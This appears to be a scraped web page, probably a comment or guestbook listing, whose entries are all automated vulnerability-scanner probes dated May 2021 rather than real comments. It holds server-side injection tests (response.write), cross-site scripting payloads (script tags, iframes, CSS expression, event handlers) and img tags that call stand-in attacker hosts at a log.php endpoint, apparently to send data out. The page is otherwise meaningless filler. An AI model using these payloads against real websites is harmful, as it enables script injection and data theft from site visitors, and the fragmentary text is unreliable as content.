  "+response.write(9808973*9397966)+"


 • pHqghUme

  2021-05-06 07:52:09


  response.write(9808973*9397966)


 • "+response.write(9803630*9706080)+"

  2021-05-06 07:52:08


  1


 • response.write(9803630*9706080)

  2021-05-06 07:52:07


  1


 • '+response.write(9803630*9706080)+'

  2021-05-06 07:52:07


  1


 • pHqghUme

  2021-05-06 07:52:06


  1


 • pHqghUme

  2021-05-06 07:52:06


  1


 • pHqghUme

  2021-05-06 07:52:05


  1


 • pHqghUme

  2021-05-06 07:52:05


  1


 • pHqghUme

  2021-05-06 07:52:04


  1


 • pHqghUme

  2021-05-06 07:52:04


  1


 • pHqghUme

  2021-05-06 07:51:47


  1fLtMAElO


 • pHqghUme

  2021-05-06 07:51:46


  1


 • 1mxIXb64O

  2021-05-06 07:51:46


  1


 • pHqghUme

  2021-05-06 07:51:45


  1


 • pHqghUme

  2021-05-06 07:48:42


  1


 • pHqghUme

  2021-05-06 07:48:20


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme<7fkd7L<

  2021-05-06 05:49:55


  1


 • pHqghUme<img sRc='http://attacker-9191/log.php?

  2021-05-06 05:49:43


  1


 • pHqghUme<WvUdf0 x=9612>

  2021-05-06 05:49:31


  1


 • pHqghUme

  2021-05-06 05:49:28


  1<vxWKBc<


 • pHqghUme<ifRAme sRc=9087.com></IfRamE>

  2021-05-06 05:49:20


  1


 • pHqghUme

  2021-05-06 05:49:18


  1<img sRc='http://attacker-9460/log.php?


 • pHqghUme<WQ251G>86HIR[!+!]</WQ251G>

  2021-05-06 05:49:07


  1


 • pHqghUme

  2021-05-06 05:49:07


  1<fyult4 x=9690>


 • pHqghUme3Kmn5 <ScRiPt >Je4i(9313)</ScRiPt>

  2021-05-06 05:48:59


  1


 • pHqghUme

  2021-05-06 05:48:56


  1<ifRAme sRc=9175.com></IfRamE>


 • pHqghUme<% contenteditable onresize=Je4i(9532)>

  2021-05-06 05:48:46


  1


 • pHqghUme

  2021-05-06 05:48:45


  1<W58960>TCN6Y[!+!]</W58960>


 • pHqghUme}body{acu:Expre/**/SSion(Je4i(9952))}

  2021-05-06 05:48:35